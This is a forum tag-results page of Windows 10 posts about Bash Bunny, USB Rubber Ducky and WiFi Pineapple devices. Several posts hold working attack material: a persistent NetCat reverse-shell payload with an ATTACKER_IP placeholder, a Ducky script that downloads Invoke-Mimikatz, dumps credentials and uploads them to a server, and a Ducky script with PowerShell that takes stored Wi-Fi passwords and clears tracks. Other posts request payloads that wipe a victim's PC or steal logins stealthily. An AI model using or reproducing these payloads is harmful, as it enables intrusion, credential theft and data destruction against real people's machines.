Showing results for tags 'Windows 10'.

  1. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  2. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the Windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server (replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receive the data?? With: 'nc -l -p 80'. What am I doing wrong here?
  3. As the title says, I would like to learn to change/spoof my MAC Address. I changed my network card's Locally Administered MAC Address but this did not work, as after a restart to make the changes set in I checked my modem-router and it showed that my MAC Address was still the hardware's value rather than the new one I set. If I did something wrong please let me know; if there is something else I can try I'm all ears. All help is greatly appreciated.
  4. My first script using the Ducky... Begged, stole and borrowed from other people's code and amended to get to what I wanted, most of the code is from Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise: * It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY * It then uses Select-String cmdlet to get the password for the wireless networks on the target machine * Saves this (albeit slightly messily) to Output.txt on the Ducky * Finally gets rid of the TEMP file and history in the run command window Look forward to comments and anything anyone can suggest to speed this up and make it better. Cheers Audie Ducky Script REM Author: Audie2180 REM Ducky WIFI credential plain text password report: 1.0 REM Target: Windows 10 REM Firmware: Twin Duck 2.1 REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks DELAY 1000 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ----Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM ----Make batch file that waits for SD card to mount. 
REM ----Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM ----Continue script STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt ENTER CONTROL z ENTER REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Run BAT file DELAY 1000 GUI r DELAY 500 STRING %TEMP%/DuckyWait.bat DELAY 500 ENTER DELAY 800 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM --- Clean up, close CMD, delete tmp files, remove command prompt hist REM --- Cleanup file created DELAY 500 STRING del /f %TEMP%\DuckyWait.bat ENTER REM ----Clear the Run history and exit DELAY 500 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Flash CAPSLOCK CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK ... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file... a.ps1 #Make a list with all WiFi SSID's and passwords stored locally on Windows OS. 
$output = netsh.exe wlan show profiles $profileRows = $output | Select-String -Pattern 'All User Profile' $profileNames = New-Object System.Collections.ArrayList #for each profile name get the SSID and password for($i = 0; $i -lt $profileRows.Count; $i++){ $profileName = ($profileRows[$i] -split ":")[-1].Trim() $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' if($passwordSearchResult){ $profilePw = ($passwordSearchResult -split ":")[-1].Trim() } else { $profilePw = '' } $networkObject = New-Object -TypeName psobject -Property @{ ProfileName = $profileName SSID = $profileSSID Password = $profilePw } $profileNames.Add($networkObject) } $profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password
  5. So here's what's going on: I made a shell, using reverse_tcp. And I put it on victim's computer and opened it. Everything went smoothly in the process of opening the exe; anyways, after I opened it, the shell didn't send a TCP connection back to me. I'm doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a VM then uploaded it to mediafire and downloaded on other PC. But when I ran it, I didn't get a connection back, it was like it was never run. Here's all my console output currently even after opening. I didn't take a screenshot but I did copy and paste. And put it on pastebin, so here's the link. Hopefully one of you can help me. I would also like to say that the target PC had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local IP. That link shows the whole process of setting up the payload and handler; that's all I did. Thanks to everyone who takes the time to read this, I really need help.
  6. So I am picking up this bad boy today http://www.microcenter.com/product/474706/XPS_15_156_Gaming_Laptop_Computer_-_Silver and I am going to throw Ubuntu 16.04 on it. I am not interested in dual booting as I have been using Linux for years. However, now that Windows 10 doesn't come with physical CD keys anymore, does anyone know a way to get the Windows 10 licence key extracted in case I want to throw Windows back on it?
  7. As of 10/30/17 Kali Linux downloads will not work, through both the HTTP download and the torrent link, both debian.exe installer packages cannot locate win32-loader.ini on my Windows 10 laptop. If anybody has a torrent for the old ISO file it would be much appreciated. I've been at this for about 3 hours now and can't find an ISO image to flash onto the USB stick on kali.org, and the virtual images are not working for me either.
  8. Hi Guys, My friend has lent me his hard drive with some music production files (.wav and .mp3 files) on it but he has somehow encrypted the files and has asked me to remove the encryption from it. He says he used Windows 10 and after some digging around found Microsoft uses EFS Encryption. I tried his laptop to remove the encryption as it would have had the key to it and after an hour of playing around he tells me that he re-installed the OS so the key would have been lost. I have searched online for a few answers and found a couple which haven't convinced me. I found this site https://www.elcomsoft.co.uk/aefsdr.html that says it can remove EFS on NTFS but I am not willing to pay the price tag unless I have proof of success. If anyone can verify for me that they have a good success rate that would be awesome. Or does anyone know if GitHub has any programs that can be run in a Linux OS like Kali or Parrot that I can use to break the encryption?
  9. Hello! I recently ordered a USB Rubber Ducky, and still a noob at it. I was wondering if one of you guys would be kind enough to make it do something, if it's possible. I want it, after it's plugged, to immediately start backing up the windows 10 and then after that it sends saves it online, or I heard about "TwinDuck" which can make it save it on there, which is better... So after it saves a backup on the Ducky, I want it to completely destroy the PC, maybe by erasing "System32" I am not sure I just want it to mess it up and delete everything. All while the backup is still on the rubber ducky. I would really appreciate if one could help me with such a mission, thanks! PS: If it could be compatible with all windows versions, it would be better.
  10. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  11. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  12. I'm trying to upgrade my firmware of this yard stick one. But I keep getting different errors. Now I have the bad address one.

          root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 erase_all
          RC = 0 (OK)
          root@raspberrypi3:/home/pi/rfcat_170508# rfcat_bootloader /dev/RFCAT_BL_YS1 download firmware/CCBootloader/CCBootloader-rfcat-ys1.hex
          Writing :0600000002017B02140363
          RC = 3 (Bad Address)
          Error downloading code!
  13. I am finding that I am having an error with some PowerShell code that I am working on. What I want to be able to do is to have a variable, say $uk, where the drive label name is 'backup' and then force the creation of folders using the declared variable as the drive letter eg $uk\$env:computername\$env:username . The code is pasted below:

          #Assigns $uk Variable to current drive letter for the mounted volume where the label name = backup
          $uk = Get-WmiObject Win32_Volume | ? {$_.label -eq 'backup'}
          #Creates a directory on the C:\ Drive naming the folders [The Computer Name] and [User] and ignores if already exists.
          md $uk\$env:computername\$env:username -force | Out-Null
          #It then uses Get-WmiObject to get the OS information and exports this info to the created directory calling the file export.csv.
          Get-WmiObject -class win32_operatingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv
          #Then echos Export Complete into console.
          echo "Export Complete"
          #Sleep for two seconds.
          Start-Sleep -s 2
          #Kill Powershell process.
          #stop-process -Id $Pid

      However, when this runs I get this error:

          md : Illegal characters in path.
          At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1
          + md $uk\$env:computername\$env:username -force | Out-Null
          + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException
          + FullyQualifiedErrorId : ItemExistsArgumentError,Microsoft.PowerShell.Commands.NewItemCommand
          md : Illegal characters in path.
          At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1
          + md $uk\$env:computername\$env:username -force | Out-Null
          + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...6ed}\\"\MATT-PC:String) [New-Item], Argu mentException
          + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand
          md : Illegal characters in path.
          At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:8 char:1
          + md $uk\$env:computername\$env:username -force | Out-Null
          + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          + CategoryInfo : InvalidArgument: (\\MATT-PC\root\...\"\MATT-PC\Matt:String) [New-Item], Argu mentException
          + FullyQualifiedErrorId : CreateDirectoryArgumentError,Microsoft.PowerShell.Commands.NewItemCommand
          Export-Csv : Cannot perform operation because the wildcard path \\MATT-PC\root\cimv2:Win32_Volume.DeviceID= "\\\\?\\Volume{2277fba4-e118-11e3-8533-94de807ff6ed}\\"\MATT-PC\Matt\export.csv did not resolve to a file.
          At C:\Users\Matt\OneDrive\Documents\Matt's Documents\ExportOSInfo.ps1:10 char:46
          + ... ingsystem | Export-Csv $uk\$env:computername\$env:username\export.csv ...
          + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          + CategoryInfo : OpenError: (\\MATT-PC\root\...Matt\export.csv:String) [Export-Csv], FileNotF oundException
          + FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.ExportCsvCommand

      Obviously there is an error in the file path where it is trying to get the volume. I am not too sure how I would fix this. Tried wrapping the variable name in ${} and with a :\ after the variable eg $uk:\, neither of these produce the desired result. Can anyone help? Matt
  14. Can somebody of the staff answer this question please? How can I get RNDIS_ethernet to work on Windows 10?
  15. Has anyone encountered issues when plugging the Bash Bunny into a Windows 10 machine? RNDIS_ETHERNET on Windows 10 brings up a Device Driver Install window which stays on the screen for some time. This can be minimized via the bunny script; however, I wasn't sure if this was an expected behavior.
  16. Has anyone else come across any driver issues with the RNDIS or WPD drivers for BashBunny on Windows 10 x64 Build 14393? Flash drive loads, payload is set for ATTACKMODE RNDIS_ETHERNET STORAGE and the device shows in device manager but without drivers.
  17. Greetings, I just received the BashBunny in the mail, so please bear with me. I was just trying to get started, when I ran into problems trying to share an internet connection w/ Windows 10. If I use the default payload on switch 2, ATTACKMODE RNDIS_ETHERNET STORAGE, or vice versa, it refuses to pop up as an Ethernet device in Windows. Just RNDIS_ETHERNET works, but isn't that kind of a problem when it comes to saving loot? On a side note: "Many combinations of attack modes are possible, however some are not. For example, ATTACKMODE HID STORAGE ECM_ETHERNET is valid while ATTACKMODE RNDIS_ETHERNET ECM_ETHERNET STORAGE SERIAL is not." - http://wiki.bashbunny.com/#!index.md How do I know what is a proper attackmode combination?
  18. Hi, I have my Nano set up properly on 2 laptops. However, when I try to use my desktop at home there is no dropdown box to select the pineapple for internet sharing in the configure adapters menu for Win 10? I have tried disabling Defender, which was suggested on another site; did not fix it. :( Any help would be greatly appreciated. Here is a screenshot; there should be a dropdown menu under Allow other network users to connect
  19. Hello, First time posting, so please feel free to correct me if I am posting in the wrong place. I am finally upgrading my old rig to 64bit and reformatting so as to have a clean install with multiple partitions, so I can easily reformat in the future. What I was trying to find and could not locate was the episode in the pre-revision3 days where Darren had made a boot disk with all of the software he wanted already pre-installed on the OS. I would like to do the same but in a reformat drive. Where I would boot my PC into and do a clean install with all my software already there, just need to load keys or update them. At one point I thought I would make my setup and then make a ghost image of it on a drive. So I would just copy the image back over the drive with my OS on it. Can this be done on Windows 10 and how should I go about it?
  20. I purchased the Rubber Ducky recently to grab Windows login creds from Windows 10. I was unaware at the time that it wouldn't quite work as solid on 10 as it does with older versions of Windows. After testing on various other versions and having it upload the .creds to my server, nothing happened when I attempted it on my target machine (Windows 10). I played around with it quite a bit and finally got the .creds uploading but with 0 data. Doing some research I came across this page explaining using PowerMemory to edit the registry for storing plaintext credentials. I did this the manual way, rebooted, and voilà, I have my .creds file on the server with the credentials. However this was done on a test machine and not my target machine. HERE IS MY REQUEST: Does anyone have or can write a payload to automate this process in a stealth manner much like the Mr Robot payload? Maybe I am overlooking something as I am so new to this. Also it could be possible that it would have worked without PowerMemory editing the registry as I disabled Windows Defender before trying PM as I saw it has blocked some MK features during my previous attempts. Any feedback would be greatly appreciated!
  21. Hi, I had to set up 6 PCs and a laptop. The PCs were shipped to the user's office. I spent two days setting everything up due to not being able to use USMT and network issues on these PCs to transfer data from the old to the new. There are some issues with drivers for things like printers and scanners.
  22. Alright, so I purchased rubber ducky a few weeks ago. Since I received the package I have been trying simple payloads but it never works for me. Part of the problem is that every time I plug in the USB, the target machine (Windows10 or Windows7, no security software) behaves as if I'm pressing ctrl+alt+del. If I don't touch anything and let's say there are a couple of tab keystrokes on the payload, I can see the machine tabbing through the ctrl+alt+del screen menu. Which leads me to believe the USB is recognized and somewhat functioning. But it doesn't matter what I use for the first line of the payload. It can be GUI r or Controls Escape, the behavior is always the same.

          REM open cmd
          DELAY 3000
          GUI r
          DELAY 300
          STRING cmd
          DELAY 100
          ENTER
  23. I have added a script to set the background image of a windows 10 ( might work on other versions also..) https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Change-the-background-to-MyLittlePoney-(win10) Regards Keld. rubberduckcode.txt
  24. I have no idea why clients won't connect to my Tetra? Can someone offer me some thoughts? I've followed all the vids and docs... Very frustrated :-( Hope this can get resolved.
  25. Hi, I am new to wifi pineapple. I am having a problem with my wifi pineapple nano for windows 10. I followed the initial setup of nano for windows and I am not getting any internet connection. When I click the "Load Bulletins" from Dashboard, I get the error: "Error connecting to WiFiPineapple.com. Please check your connection.". I have attached the images for my network setting and the error I am getting. Can someone please tell me what I am doing wrong? Thanks!